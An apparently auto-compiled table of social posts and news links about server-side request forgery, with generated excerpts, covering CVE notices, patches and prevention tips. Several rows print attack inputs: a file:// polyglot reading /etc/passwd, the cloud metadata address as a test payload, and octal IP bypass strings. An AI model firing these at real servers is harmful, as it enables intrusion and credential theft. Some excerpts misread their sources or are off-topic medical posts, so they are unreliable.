A somewhat curated list of links to various topics in application security.
| Item | Date Added | Link | Excerpt |
|---|---|---|---|
| 1 | 2025-10-06 21:58:42 UTC | Splunk issued patches for six flaws including a High-severity blind SSRF (CVE-2025-20371) and XSS issues that could allow attackers to access sensitive data and crash the platform. #Splunk #SplunkSecurity #SSRF #XSS #Cybersecurity | Splunk recently released patches for six vulnerabilities, including a critical blind SSRF (CVE-2025-20371) and XSS flaws. These issues could be exploited by attackers to gain unauthorized access to sensitive data and potentially crash the Splunk platform. The patches aim to address these security vulnerabilities and enhance the overall cybersecurity of the Splunk system. #Splunk #SplunkSecurity #SSRF #XSS #Cybersecurity |
| 2 | 2025-10-06 21:46:37 UTC | Well Well Well. Its Another Day. (Oracle E-Business Suite Pre-Auth RCE Chain - CVE-2025-61882) | The content discusses a security vulnerability in Oracle E-Business Suite, identified as CVE-2025-61882, allowing remote code execution without authentication. This pre-authentication exploit poses a significant risk to systems running the affected software. The article emphasizes the importance of promptly addressing this vulnerability to prevent potential cyber attacks and data breaches. |
| 3 | 2025-10-06 12:53:33 UTC | Payload-less exploits cause real damage without dropping malware SSRF XXE IDOR. Most scanners miss them. Recon chains catch them. Read more #CyberSecurity #AppSec #SSRF #XXE #IDOR #Recon #ThreatIntel #Infosec | The content discusses how payload-less exploits like SSRF, XXE, and IDOR can cause significant damage without dropping malware. These exploits are often missed by scanners but can be detected by recon chains. The post emphasizes the importance of understanding and addressing these vulnerabilities in cybersecurity to prevent potential threats. It encourages readers to learn more about these issues and provides relevant hashtags for further exploration. |
| 4 | 2025-10-05 14:48:47 UTC | SSRF attacker tricks your server into fetching URLs it shouldn't (internal admin or metadata). Stop it: dont fetch user URLs directly use allowlists block private/internal IPs enforce egress filters/proxy and require auth for internal services #WebSecurity #SSRF #InfoSec | The content warns about SSRF attacks where servers fetch unauthorized URLs. To prevent this, avoid fetching user URLs directly, use allowlists, block private/internal IPs, enforce egress filters/proxy, and require authentication for internal services. These measures enhance web security and protect against SSRF threats. #WebSecurity #SSRF #InfoSec |
| 5 | 2025-10-03 19:43:14 UTC | Server-Side Request Forgery (SSRF) is a rising web attack vector. An attacker can trick your app into making requests to internal or cloud resources. Learn what it is and how to prevent #AppSec #SSRF #CloudSecurity #CyberSecurity | Server-Side Request Forgery (SSRF) is a growing web attack where attackers manipulate your app to access internal or cloud resources. Understanding SSRF is crucial for #AppSec, #CloudSecurity, and #CyberSecurity. Prevention measures are essential to safeguard against this threat. |
| 6 | 2025-10-03 12:11:24 UTC | Critical Splunk Vulnerabilities Affect Multiple Versions | The content discusses critical vulnerabilities in Splunk affecting multiple versions. These vulnerabilities pose significant security risks and could potentially be exploited by attackers. It is important for users of Splunk to be aware of these vulnerabilities and take necessary actions to mitigate the risks, such as applying patches or updates provided by Splunk. Keeping systems up to date and implementing security best practices are crucial to safeguard against potential exploitation of these vulnerabilities. |
| 7 | 2025-10-02 15:38:28 UTC | Hack this one! KNOXSS v4.3.0 released with support to #SSRF-based #XSS regular and Blind. | KNOXSS v4.3.0 has been released with support for SSRF-based XSS, including regular and Blind XSS. This update allows for hacking opportunities using these vulnerabilities. The release aims to enhance security testing capabilities by addressing these specific types of cross-site scripting vulnerabilities. |
| 8 | 2025-10-02 10:33:48 UTC | HIGH severity SSRF in Apache Kylin (v4.0.05.0.2) lets attackers abuse admin rights for internal requests. Upgrade to 5.0.3 ASAP! Details: radar.offseq.com/threat/cve-202 #OffSeq #ApacheKylin #SSRF #Cybersecurity | A high severity Server-Side Request Forgery (SSRF) vulnerability in Apache Kylin (v4.0.0–5.0.2) allows attackers to exploit admin rights for internal requests. Urgent upgrade to version 5.0.3 is recommended to mitigate the risk. More information available at radar.offseq.com/threat/cve-202. Take action promptly to address this cybersecurity threat. #OffSeq #ApacheKylin #SSRF #Cybersecurity |
| 9 | 2025-10-02 06:41:11 UTC | Splunk Enterprise Vulnerabilities Allow Remote JavaScript Injection Attacks | The article discusses vulnerabilities in Splunk Enterprise that enable remote JavaScript injection attacks. These vulnerabilities could potentially allow attackers to inject malicious code into Splunk Enterprise instances, leading to security breaches. It highlights the importance of promptly addressing and patching these vulnerabilities to prevent unauthorized access and data compromise. The article serves as a warning to Splunk Enterprise users to stay vigilant and update their systems to protect against potential cyber threats. |
| 10 | 2025-09-30 14:28:06 UTC | KNOXSS v4.3.0 is out! Now with another Blind #XSS payload in a file format to catch Rendered Blind #SSRF-based scenarios Also a regular SSRF-based Reflected Remote XHTML Inclusion. Complete detection list below. knoxss.pro/?page_id=766 #BugBounty #WebAppSec #PenTesting | KNOXSS v4.3.0 release includes a new Blind XSS payload in a file format for Rendered Blind SSRF-based scenarios and SSRF-based Reflected Remote XHTML Inclusion. The update enhances detection capabilities. More details can be found at knoxss.pro/?page_id=766. The release is relevant for Bug Bounty programs, Web Application Security, and Penetration Testing. |
| 11 | 2025-09-29 15:28:25 UTC | Before the next update with #SSRF-based #XSS you can already use our completely free Blind XSS Service with SVG image generator. With that customized image with your unique ID in our system you can host online or upload manually to test Blind SSRF-based scenarios. #BugBounty | The content introduces a free Blind XSS Service with an SVG image generator to test Blind SSRF-based scenarios before the next update with SSRF-based XSS. Users can create a customized image with a unique ID in the system, which can be hosted online or uploaded manually for testing purposes. The service is offered for Bug Bounty hunters. |
| 12 | 2025-09-27 18:13:38 UTC | On 1 page: Charles Barkla's 1904 @Nature report of polarization of x-rays at the Original Redbrick #SSRF @NIST @livuniphysics @aapmHQ @esrfsynchrotron @advancedphoton @EuropeanXFEL @DiamondLightSou @spring8pr @advlightsource @desynews @synchroSOLEIL | In a concise 100-word summary, the content mentions Charles Barkla's 1904 report on x-ray polarization at the Original Redbrick. The post includes various Twitter handles related to physics institutions and synchrotron facilities. The link provided likely directs to further information on the topic. |
| 13 | 2025-09-27 15:13:41 UTC | This version of the polyglot payload below can help in a bypass. The addition of the localhost gives room for most of the traditional host-based SSRF tricks. file://127.0.0.1/etc/passwd?/../passwd #SSRF #LFR #Bypass #BugBounty | The content discusses a polyglot payload that includes localhost to aid in bypassing security measures. By utilizing file://127.0.0.1/etc/passwd?/../passwd, traditional host-based SSRF tricks can be employed. The post also includes hashtags related to server-side request forgery (SSRF), local file read (LFR), bypass techniques, and bug bounty programs. |
| 14 | 2025-09-26 18:18:22 UTC | Released check it out! brutelogic.net/ssrf-mastery-s #SSRF #BugBounty #PenTesting | A new release is available on brutelogic.net focusing on SSRF mastery for Bug Bounty and Pen Testing. The content can be accessed at brutelogic.net/ssrf-mastery-s. The release is relevant for those interested in SSRF, Bug Bounty programs, and Pen Testing. |
| 15 | 2025-09-26 15:13:48 UTC | SSRF Mastery Series: Fundamentals The Complete Guide to Server-Side Request Forgery Discovery and Exploitation By @RodoAssis @BRuteLogic Check it out! #SSRF #BugBounty #PenTesting #WebAppSec brutelogic.net/ssrf-mastery-s | The content is about an SSRF Mastery Series that provides a comprehensive guide on Server-Side Request Forgery (SSRF) discovery and exploitation by @RodoAssis and @BRuteLogic. The series covers fundamentals and is aimed at Bug Bounty hunters, Penetration Testers, and Web Application Security enthusiasts. The link provided directs to brutelogic.net for more information. #SSRF #BugBounty #PenTesting #WebAppSec. |
| 16 | 2025-09-26 13:13:23 UTC | Talking about #SSRF I just got an idea to add SSRF-based #XSS to @KN0X55 ! It's coming in the update next week most probably. #WebAppSec #BugBounty #PenTesting | The content discusses adding SSRF-based XSS to a platform called @KN0X55 in an upcoming update next week. This idea was inspired by discussions around Server-Side Request Forgery (SSRF). The update aims to enhance security measures, particularly in the realms of web application security, bug bounty programs, and penetration testing. The post also includes relevant hashtags such as #WebAppSec, #BugBounty, and #PenTesting. |
| 17 | 2025-09-26 08:11:31 UTC | IMDS Abused: Hunting Rare Behaviors to Uncover Exploits | The article discusses how attackers exploit vulnerabilities in the IMDS (Instance Metadata Service) by hunting for rare behaviors to uncover exploits. By analyzing unusual patterns and behaviors in IMDS usage, security researchers can detect potential threats and zero-day vulnerabilities. The focus is on understanding how attackers abuse IMDS to gain unauthorized access and compromise systems. The article emphasizes the importance of proactive monitoring and anomaly detection to protect against such attacks and prevent security breaches. |
| 18 | 2025-09-25 20:08:13 UTC | Web Pentest Tip SSRF 1 What SSRF is 2 Why its dangerous 3 Lab-only vulnerable pattern 4 Mitigation & defenses Always test with authorization. #SSRF #WebSecurity #AppSec #Infosec #OWASP #Pentesting #CloudSecurity | The content provides a web pentest tip on Server-Side Request Forgery (SSRF), covering what SSRF is, why it's dangerous, lab-only vulnerable patterns, and mitigation strategies. It emphasizes the importance of testing with authorization to enhance security. The post includes relevant hashtags such as #SSRF, #WebSecurity, #AppSec, #Infosec, #OWASP, #Pentesting, and #CloudSecurity. |
| 19 | 2025-09-25 17:13:23 UTC | Coming ASAP! #SSRF #BugBounty | The content indicates that something related to SSRF (Server-Side Request Forgery) and Bug Bounty is forthcoming soon. The hashtag #SSRF suggests a focus on SSRF vulnerabilities, while #BugBounty implies a potential reward for identifying and reporting bugs. The link provided likely leads to more details or updates on this upcoming development. |
| 20 | 2025-09-25 02:49:55 UTC | Side-by-Side Comparison of SSRF vs. CSRF | Attaxion | This content compares SSRF (Server-Side Request Forgery) and CSRF (Cross-Site Request Forgery) vulnerabilities, focusing on their targets, impact, and mitigation techniques. It highlights the differences between the two types of vulnerabilities to help readers understand their distinct characteristics and how to address them effectively. |
| 21 | 2025-09-24 08:03:46 UTC | Proud to share I discovered MULTIPLE SSRF bypasses in the NPM ip lib (v2.0.1 10M weekly downloads): Null Route Bypass ("0") - CVE-2025-59437 Octal Format Bypass ("017700000001") - CVE-2025-59436 Impact: complete bypass of SSRF protections. #AppSec #SSRF #supplychainsecurity | Multiple SSRF bypasses were discovered in the NPM ip lib (v2.0.1, 10M weekly downloads): Null Route Bypass ("0") - CVE-2025-59437 and Octal Format Bypass ("017700000001") - CVE-2025-59436. These bypasses allow for a complete bypass of SSRF protections, impacting supply chain security. #AppSec #SSRF #supplychainsecurity. |
| 22 | 2025-09-24 07:41:42 UTC | Hackers Exploit Pandoc CVE-2025-51591 to Target AWS IMDS and Steal EC2 IAM Credentials | Hackers are exploiting a vulnerability in Pandoc, identified as CVE-2025-51591, to target Amazon Web Services (AWS) Instance Metadata Service (IMDS) and steal EC2 Identity and Access Management (IAM) credentials. This security breach allows unauthorized access to sensitive information stored on AWS servers. It is crucial for AWS users to be aware of this threat and take necessary precautions to protect their data and credentials. |
| 23 | 2025-09-23 18:58:17 UTC | SRF vs CSRF arent the same One targets the server The other the user See the side by side comparison & protection tips: #Cybersecurity #SSRF #CSRF #Attaxion | The content highlights the differences between Server-Side Request Forgery (SSRF) and Cross-Site Request Forgery (CSRF). SSRF targets the server, while CSRF targets the user. The post suggests viewing a side-by-side comparison and offers protection tips for both vulnerabilities. It emphasizes the importance of cybersecurity and includes hashtags for SSRF, CSRF, and Attaxion. |
| 24 | 2025-09-23 15:53:20 UTC | Server leaking secrets? Thats SSRF! Conquered Intro to SSRF on @TryHackMe. Tips: 1) Tweak URL params (e.g. 127.0.0.1) for recon. 2) Use Burp Collaborator for blind SSRF. 3) Whitelist URLs. Whos next? #CyberSec #SSRF #TryHackMe | The content discusses Server-Side Request Forgery (SSRF) vulnerabilities and provides tips for exploiting them, such as manipulating URL parameters for reconnaissance, utilizing Burp Collaborator for blind SSRF attacks, and whitelisting URLs for protection. The author shares their success in mastering an "Intro to SSRF" challenge on TryHackMe and encourages others to try it. The post is tagged with #CyberSec, #SSRF, and #TryHackMe. |
| 25 | 2025-09-23 14:53:24 UTC | Warning: New #Flowise vulnerabilities were published. CVE-2025-59527 (CVSS 7.5) is a #SSRF vulnerability. CVE-2025-59528 (CVSS 10.0) could result in #RCE. Keep an eye on future security bulletins and #Patch #Patch #Patch | New vulnerabilities in #Flowise have been disclosed: CVE-2025-59527 is a #SSRF vulnerability with a CVSS score of 7.5, while CVE-2025-59528 poses a more severe risk with a CVSS score of 10.0, potentially leading to #RCE. It is crucial to stay updated on security bulletins and promptly apply patches to mitigate these vulnerabilities. #Patch #Patch #Patch. |
| 26 | 2025-09-22 09:48:18 UTC | Servers making secret calls? SSRF attacks can expose internal systems! Prevent it: Validate & sanitize all user-input URLs. Test your endpoints with #DentiScan. #SSRF #CyberSecurity #WebSecurity | SSRF attacks can expose internal systems by tricking servers into making secret calls. To prevent this, validate and sanitize all user-input URLs. Test your endpoints using #DentiScan for improved cybersecurity and web security. #SSRF #CyberSecurity #WebSecurity. |
| 27 | 2025-09-22 07:48:41 UTC | MEDIUM severity alert: MuYuCMS 2.02.7 vulnerable to SSRF via Add Friend Link! Remote attackers can probe internal resources. Audit & restrict input now. Details: #OffSeq #MuYuCMS #SSRF | MuYuCMS version 2.0-2.7 is susceptible to SSRF through the Add Friend Link, allowing remote attackers to access internal resources. It is advised to audit and limit input to prevent exploitation. This vulnerability poses a medium severity risk and should be addressed promptly. #OffSeq #MuYuCMS #SSRF |
| 28 | 2025-09-21 17:48:32 UTC | Flask 3.1.1 SSRF Zero-Day Shodan dork exposed 500 targets 0day PoC (CWE-918) Full Article: nullsecurityx.codes/ssrf-vulnerabi Video: youtube.com/watch?v=Levx_p Responsible disclosure & defensive demo only. #infosec #vulnerability #SSRF #BugBounty | A zero-day vulnerability in Flask 3.1.1 related to SSRF was exposed through a Shodan dork, revealing 500+ potential targets. A proof of concept (PoC) for this vulnerability (CWE-918) was shared. The full article and a video demonstrating the issue were provided. The disclosure was done responsibly, and a defensive demo was included. The content emphasizes information security, vulnerability, SSRF, and Bug Bounty programs. The details can be found at nullsecurityx.codes/ssrf-vulnerabi and the video is available on YouTube. |
| 29 | 2025-09-21 17:48:32 UTC | New video: Flask 3.1.1 SSRF Zero-Day Shodan dork exposed 500 targets 0day PoC (CWE-918). Watch now youtube.com/watch?v=Levx_p Responsible disclosure & defensive demo only. #infosec #vulnerability #SSRF #BugBounty | A new video exposes a Flask 3.1.1 SSRF Zero-Day vulnerability using a Shodan dork that revealed 500+ targets with a 0day Proof of Concept (CWE-918). The content emphasizes responsible disclosure and includes a defensive demo. The video can be watched on YouTube. The focus is on information security, vulnerability, SSRF, and Bug Bounty programs. |
| 30 | 2025-09-21 10:48:30 UTC | PREMIERE TONIGHT: Flask 3.1.1 SSRF Zero-Day (CWE-918) 8:00 PM (03) In this video: Discover 500 potential targets via Shodan dork PoC demo Turn on notifications so you dont miss it! Watch here: youtube.com/watch?v=Levx_p #BugBounty #CyberSecurity #SSRF | A video premiering tonight at 8:00 PM showcases a Flask 3.1.1 SSRF Zero-Day vulnerability (CWE-918). The content includes a demonstration of discovering 500 potential targets using Shodan dork. Viewers are encouraged to turn on notifications to not miss the premiere. The video link is provided for watching. The focus is on Bug Bounty, Cybersecurity, and SSRF. |
| 31 | 2025-09-20 18:51:11 UTC | How Tenable Found a Way To Bypass a Patch for BentoMLs Server-Side Request Forgery Vulnerability CVE-2025-54381 | Tenable discovered a method to bypass a patch for BentoML's Server-Side Request Forgery Vulnerability CVE-2025-54381. The content discusses this vulnerability and the workaround found by Tenable. |
| 32 | 2025-09-20 18:43:38 UTC | You are Legend whatsapp.com/channel/0029Vb #BugBounty #SSRF #CVE2025 | The content refers to a potential bug bounty opportunity related to SSRF (Server-Side Request Forgery) and CVE-2025. It mentions a link (whatsapp.com/channel/0029Vb) and encourages individuals to explore it for a chance to showcase their skills in identifying security vulnerabilities. The post suggests that participants could potentially earn rewards for discovering and reporting any bugs or vulnerabilities found in the specified channel. |
| 33 | 2025-09-20 18:43:37 UTC | We discovered an SSRF vulnerability in Flask 3.1.1 (CVE-2025-XXXX)! Our full video will be live soon on YouTube and blog For now early details are available only on our WhatsApp channel: whatsapp.com/channel/0029Vb #BugBounty #Cybersecurity #SSRF #Flask | A SSRF vulnerability was found in Flask 3.1.1 (CVE-2025-XXXX). Details are shared on a WhatsApp channel, with a full video coming soon on YouTube and a blog. The discovery is related to Bug Bounty, Cybersecurity, SSRF, and Flask. Stay tuned for more information. |
| 34 | 2025-09-18 15:26:25 UTC | Early SSRF Reduces Mortality and Improves Outcomes in Functionally Dependent Rib Fracture Patients: Study | A study suggests that early surgical stabilization of rib fractures (SSRF) can reduce mortality and improve outcomes in functionally dependent patients with rib fractures. The research highlights the benefits of timely intervention in this patient population to enhance survival rates and overall recovery. Early SSRF is shown to be effective in improving outcomes for individuals with rib fractures who are functionally dependent. |
| 35 | 2025-09-17 07:28:45 UTC | SSRF via image upload: Server fetches image URLs to resize. Attacker supplies http://internal-api/admin. Blind SSRF internal admin access. #BugBountyTips #SSRF #LogicFlaws | The content discusses a Server-Side Request Forgery (SSRF) vulnerability through image upload where the server fetches image URLs to resize. An attacker can exploit this by supplying a malicious URL like http://internal-api/admin, gaining blind SSRF access to internal admin functions. This vulnerability highlights the importance of addressing logic flaws in web applications to prevent unauthorized access. The post also includes relevant hashtags like #BugBountyTips, #SSRF, and #LogicFlaws. |
| 36 | 2025-09-16 09:23:42 UTC | Metadata SSRF: SSRF to cloud metadata returns short-lived creds. Chain SSRF metadata use creds to call IMDS and pivot into cloud resources. #BugBountyTips #SSRF #CloudSecurity | The content discusses a security vulnerability called Metadata SSRF, where Server-Side Request Forgery (SSRF) is used to access cloud metadata and obtain short-lived credentials. By chaining SSRF to access metadata and using the obtained credentials to call the Instance Metadata Service (IMDS), attackers can pivot into cloud resources. This poses a risk to cloud security. The post also includes hashtags related to Bug Bounty Tips, SSRF, and Cloud Security. |
| 37 | 2025-09-15 04:41:28 UTC | Server-Side Request Forgery: What It Is & How To Fix It | The content discusses Server-Side Request Forgery (SSRF), explaining what it is and providing solutions to fix it. SSRF is a vulnerability that allows attackers to make requests on behalf of the server, potentially leading to data breaches or unauthorized access. The article likely covers the importance of understanding and mitigating SSRF risks to protect servers and sensitive data. It may also offer guidance on implementing security measures to prevent SSRF attacks, safeguarding systems from exploitation. For detailed information, visit the provided link: https://www.wiz.io/academy/server-side-request-forgery. |
| 38 | 2025-09-14 12:13:41 UTC | Been diving into SSRF this week. Still feels a bit confusing Its one of those vulnerabilities that opens a huge rabbit hole once you start connecting the dots. #BugBounty #SSRF #AppSec #CloudSecurity #InfoSec | The author has been exploring SSRF (Server-Side Request Forgery) this week and finds it confusing. SSRF is a vulnerability that leads to a complex investigation once connections are made. The post mentions #BugBounty, #SSRF, #AppSec, #CloudSecurity, and #InfoSec. |
| 39 | 2025-09-14 08:13:19 UTC | Dive into the world of ethical hacking with this real-world cybersecurity challenge! In this video we demonstrate how open redirection and SSRF. #cybersecurity #ethicalhacking #ssrf #openredirection | The content highlights a real-world cybersecurity challenge focusing on open redirection and SSRF. It invites viewers to explore ethical hacking through a video demonstration. Key hashtags include #cybersecurity, #ethicalhacking, #ssrf, and #openredirection. The video aims to provide practical insights into these cybersecurity concepts. |
| 40 | 2025-09-10 23:58:27 UTC | GitLab patched six critical vulnerabilities including CVE-2025-6454 enabling SSRF via webhook headers and DoS through SAML response file uploads and token ops. Discovered via HackerOne bounty. #GitLab #SSRF #BugBounty | GitLab addressed six critical vulnerabilities, notably CVE-2025-6454, allowing SSRF via webhook headers and DoS through SAML response, file uploads, and token ops. These issues were identified through a HackerOne bounty program. The vulnerabilities have been patched to enhance the security of GitLab. #GitLab #SSRF #BugBounty. |
| 41 | 2025-09-10 20:11:52 UTC | GitLab Patches Vulnerabilities Allowing Denial of Service and SSRF Attacks | GitLab has addressed vulnerabilities that could lead to Denial of Service (DoS) and Server-Side Request Forgery (SSRF) attacks. These vulnerabilities have been patched to prevent potential exploitation. It is crucial for GitLab users to update their systems promptly to mitigate the risk of these security threats. |
| 42 | 2025-09-10 20:11:51 UTC | Multiple Vulnerabilities in GitLab Patched Blocking DoS and SSRF Attack Vectors | GitLab recently patched multiple vulnerabilities, preventing Denial of Service (DoS) and Server-Side Request Forgery (SSRF) attack vectors. These vulnerabilities posed potential security risks to GitLab users. The patches implemented by GitLab aim to enhance the platform's security and protect users from these types of attacks. Users are advised to update their GitLab installations promptly to ensure they are protected against these vulnerabilities. |
| 43 | 2025-09-10 15:21:46 UTC | GitLab Patches Multiple Vulnerabilities That Enables Denial Of Service and SSRF Attacks | GitLab has fixed several vulnerabilities that could lead to Denial of Service (DoS) and Server-Side Request Forgery (SSRF) attacks. These vulnerabilities have been addressed to prevent potential security risks. It is crucial for GitLab users to update their systems to the latest patched versions to mitigate these security threats. |
| 44 | 2025-09-08 11:38:32 UTC | New Research Alert! CVE-2025-8085 Unauthenticated SSRF in the WordPress Ditty plugin could allow attackers to pivot through your server into internal networks! Dive deep into the technical analysis and PoC here nullsecurityx.codes/cve-2025-8085- #WordPress #SSRF #BugBounty | A new vulnerability, CVE-2025-8085, in the WordPress Ditty plugin allows unauthenticated SSRF attacks, potentially enabling attackers to access internal networks. Detailed technical analysis and a Proof of Concept (PoC) are available for review. The vulnerability poses a risk of server compromise and network infiltration. Stay informed about WordPress security issues and consider applying patches or updates to mitigate this threat. #WordPress #SSRF #BugBounty. |
| 45 | 2025-09-08 05:38:28 UTC | Server-Side Request Forgery (SSRF) Attackers trick servers into making malicious requests. Validate URLs restrict network access use allowlists. #SSRF #WebAppSec | Server-Side Request Forgery (SSRF) involves attackers tricking servers into making malicious requests. To prevent SSRF attacks, it is crucial to validate URLs, restrict network access, and utilize allowlists. These measures help in controlling and securing server interactions, reducing the risk of unauthorized access and potential security breaches. #SSRF #WebAppSec. |
| 46 | 2025-09-07 17:38:34 UTC | Exploited xmlrpc.php can be abused to trigger Blind SSRF via pingback.ping Old feature modern risk. #BugBounty #SSRF #infosec #appsec #CyberTamarin cybertamarin.medium.com/exploiting-wor | The article discusses how the xmlrpc.php file can be exploited to trigger Blind Server-Side Request Forgery (SSRF) through the pingback.ping feature, highlighting the potential risks associated with this old feature in modern applications. The content emphasizes the relevance of this vulnerability in Bug Bounty programs and the fields of information security and application security. The author provides insights into exploiting this issue and its implications. The article can be found at cybertamarin.medium.com/exploiting-wor. |
| 47 | 2025-09-07 10:33:26 UTC | A high-severity flaw (CVE-2025-58179) in Astro's Cloudflare adapter allows attackers to bypass domain restrictions leading to SSRF and XSS attacks. #Astro #Cloudflare #Vulnerability #SSRF #WebSecurity securityonline.info/cve-2025-58179 | A critical vulnerability (CVE-2025-58179) in Astro's Cloudflare adapter enables attackers to evade domain restrictions, potentially triggering SSRF and XSS attacks. The flaw poses a significant risk to web security. #Astro #Cloudflare #Vulnerability #SSRF #WebSecurity. |
| 48 | 2025-09-06 15:33:50 UTC | Web apps arent just about login screens. From blind SQL injection to SSRF and GraphQL flaws exploitation goes way beyond the basics. Hackers know it. Do you? #WebSecurity #CyberSecurity #HackingTips #SQLInjection #SSRF #APIsecurity | The content highlights that web app security extends beyond login screens, covering vulnerabilities like blind SQL injection, SSRF, and GraphQL flaws. It emphasizes the importance of understanding these advanced exploitation techniques to enhance web security. The post prompts readers to assess their knowledge in this area and includes hashtags related to web security, cybersecurity, hacking tips, SQL injection, SSRF, and API security. |
| 49 | 2025-09-06 10:33:34 UTC | Cloud Metadata & Full Account Takeover Weve published the full article! Dive deeper into SSRF chaining cloud metadata access and full account takeover scenarios. Read the article: Video: #SSRF #BugBounty | The content discusses cloud metadata access and full account takeover through SSRF chaining. It invites readers to explore the detailed article and video on these scenarios. The focus is on understanding the risks associated with SSRF vulnerabilities and how they can lead to compromising cloud accounts. The content encourages readers to delve deeper into the topic to enhance their knowledge about potential security threats. |
| 50 | 2025-09-06 10:33:33 UTC | New Video Alert! Learn how SSRF vulnerabilities can escalate to full cloud account takeover! Dive into advanced techniques cloud metadata access and Python exploit examples. Watch now: #SSRF #CyberSecurity #EthicalHacking #BugBounty | The content is about a new video discussing SSRF vulnerabilities leading to cloud account takeover. It covers advanced techniques, cloud metadata access, and Python exploit examples. The video is aimed at those interested in cybersecurity, ethical hacking, and bug bounty programs. It invites viewers to watch and learn more about SSRF vulnerabilities and their potential impact on cloud security. |
| 51 | 2025-09-03 14:04:25 UTC | Sometimes it's as easy as this #ssrf | The content suggests that solutions can sometimes be simple, indicated by the hashtag #ssrf. It implies that finding resolutions to problems may not always be complicated. The link provided seems to lead to further information or context related to this idea. |
| 52 | 2025-09-02 05:58:25 UTC | I found an SSRF vuln scared because of teapot_bugcrowd @Bugcrowd coz if they get my report they will definitely closes as N/A without read the report! #BugBounty #bugcrowd #bughunting #ssrf | The content mentions the discovery of a Server-Side Request Forgery (SSRF) vulnerability by the user, who is concerned about reporting it to Bugcrowd due to fears that it may be closed without being read. The user expresses worry that the report will be marked as "N/A" without proper review. The post includes hashtags related to bug bounty programs, bug hunting, and SSRF. |
| 53 | 2025-09-01 22:58:39 UTC | Critical SSRF flaw in Docker Desktop containers lets attackers bypass isolation and hit the host directly. Patch now validate your network interfaces and watch out for unauthorized internal calls. Check the details here: #Docker #SSRF #CyberSecurity | A critical SSRF flaw in Docker Desktop allows attackers to bypass isolation and access the host directly. It is crucial to patch the vulnerability, validate network interfaces, and monitor for unauthorized internal calls. Stay vigilant about security measures to prevent potential breaches. #Docker #SSRF #CyberSecurity. |
| 54 | 2025-09-01 16:58:48 UTC | Server-Side Request Forgery (SSRF) Attackers trick servers into making malicious requests. Validate URLs restrict network access use allowlists. #SSRF #WebAppSec | Server-Side Request Forgery (SSRF) involves tricking servers into sending malicious requests. To prevent this attack, it is crucial to validate URLs, restrict network access, and utilize allowlists. These measures help in safeguarding against SSRF threats and enhancing web application security. #SSRF #WebAppSec. |
| 55 | 2025-08-31 07:43:45 UTC | SSRF Vulnerability in WordPress: what it is how attackers abuse it and exactly how to fix it (7 steps code). Guide: #WordPress #SSRF #CyberSecurity #AppSec #WebSecurity #DevSecOps | The content discusses SSRF vulnerability in WordPress, explaining what it is, how attackers exploit it, and provides a 7-step guide with code to fix it. The guide aims to enhance cybersecurity, application security, web security, and DevSecOps practices related to WordPress. It emphasizes the importance of addressing SSRF vulnerabilities to protect websites from potential attacks. |
| 56 | 2025-08-29 10:01:49 UTC | PhpSpreadsheet Library Vulnerability Enables Attackers to Feed Malicious HTML Input | A vulnerability in the PhpSpreadsheet library allows attackers to inject malicious HTML input. This security flaw can be exploited to execute harmful actions on systems using the library. It poses a risk of attacks that could compromise the integrity and security of systems utilizing PhpSpreadsheet. Users are advised to update to the latest version of the library to mitigate this vulnerability and enhance the security of their systems. |
| 57 | 2025-08-28 03:18:24 UTC | SSRF Tip: Test with payloads like or AWS . Use DNS loggers (Burp Collaborator) for blind SSRF. Prevention: whitelist domains #SSRF #BugBounty #WebSecurity #EthicalHacking | The content provides a tip for testing SSRF vulnerabilities using payloads like `http://169.254.169.254` or AWS. It suggests using DNS loggers like Burp Collaborator for blind SSRF testing. Prevention advice includes whitelisting domains. The post is related to SSRF, Bug Bounty, Web Security, and Ethical Hacking, emphasizing the importance of testing and securing against SSRF vulnerabilities. |
| 58 | 2025-08-27 17:13:15 UTC | New nationwide data on SSRF! Surgical stabilization of 3 rib fractures = Lower mortality (esp. flail chest!) Fewer lung complications when done early (82 hrs) Longer LOS Timely SSRF saves lives. Read below! #SSRF #CWIS @saranimd | New nationwide data shows that surgical stabilization of 3 or more rib fractures leads to lower mortality, especially in cases of flail chest. Performing the surgery early (within 82 hours) results in fewer lung complications but may lead to a longer length of stay. Timely surgical stabilization of rib fractures is crucial for saving lives. The content emphasizes the benefits of this procedure and provides a link for further information. #SSRF #CWIS @saranimd. |
| 59 | 2025-08-26 19:46:29 UTC | PhpSpreadsheet Vulnerability Allows Injection of Malicious HTML Input | The PhpSpreadsheet software has a vulnerability that enables the injection of malicious HTML input. This flaw can potentially lead to security risks and compromises. It is crucial for users of PhpSpreadsheet to be aware of this vulnerability and take necessary precautions to prevent any exploitation of the software. Regular updates and security measures should be implemented to mitigate the risk of malicious attacks through this vulnerability. |
| 60 | 2025-08-26 12:41:39 UTC | PhpSpreadsheet Library Vulnerability Lets Attackers Inject Malicious HTML Input | The PhpSpreadsheet library has a vulnerability that allows attackers to inject malicious HTML input. This vulnerability could be exploited by attackers to execute harmful actions on systems using the library. It is crucial for users of PhpSpreadsheet to be aware of this issue and take necessary precautions to prevent potential attacks. |
| 61 | 2025-08-26 08:11:19 UTC | Windows Docker Desktop Vulnerability Allows Full Host Compromise | A vulnerability in Windows Docker Desktop has been identified, potentially leading to a full host compromise. This vulnerability could allow attackers to gain unauthorized access to the host system. Users are advised to update their Docker Desktop installations to the latest version to mitigate the risk of exploitation. |
| 62 | 2025-08-26 04:23:48 UTC | A new report reveals a critical SSRF vulnerability in the PhpSpreadsheet library. The flaw could allow attackers to access internal networks and sensitive data. #CyberSecurity #PHP #Vulnerability #SSRF #OpenSource | A critical SSRF vulnerability in the PhpSpreadsheet library has been reported, potentially enabling attackers to access internal networks and sensitive data. This flaw poses a significant risk to cybersecurity and highlights the importance of addressing vulnerabilities promptly in open-source software like PhpSpreadsheet. #CyberSecurity #PHP #Vulnerability #SSRF #OpenSource |
| 63 | 2025-08-23 02:58:10 UTC | WordPressプラグインEventin4.0.37以下に脆弱性 ログイン不要でサーバーを踏み台化可能 内部システムへの不正アクセスリスク 機密情報漏洩認証情報取得の恐れ 対策版(4.0.38以降)への更新を推奨 詳細 #WordPress #セキュリティ #Eventin #SSRF | WordPress plugin "Eventin" versions 4.0.37 and below have a vulnerability allowing unauthorized server access, posing risks of unauthorized access to internal systems, data leaks, and credential theft. Upgrading to version 4.0.38 or higher is recommended to mitigate these risks. #WordPress #Security #Eventin #SSRF |
| 64 | 2025-08-22 12:56:15 UTC | Windows Docker Desktop Vulnerability Leads to Full Host Compromise | A vulnerability in Windows Docker Desktop has been discovered, potentially allowing attackers to compromise the entire host system. The vulnerability poses a serious security risk as it could lead to a full host compromise. It is crucial for users to be aware of this issue and take necessary precautions to mitigate the risk of exploitation. |
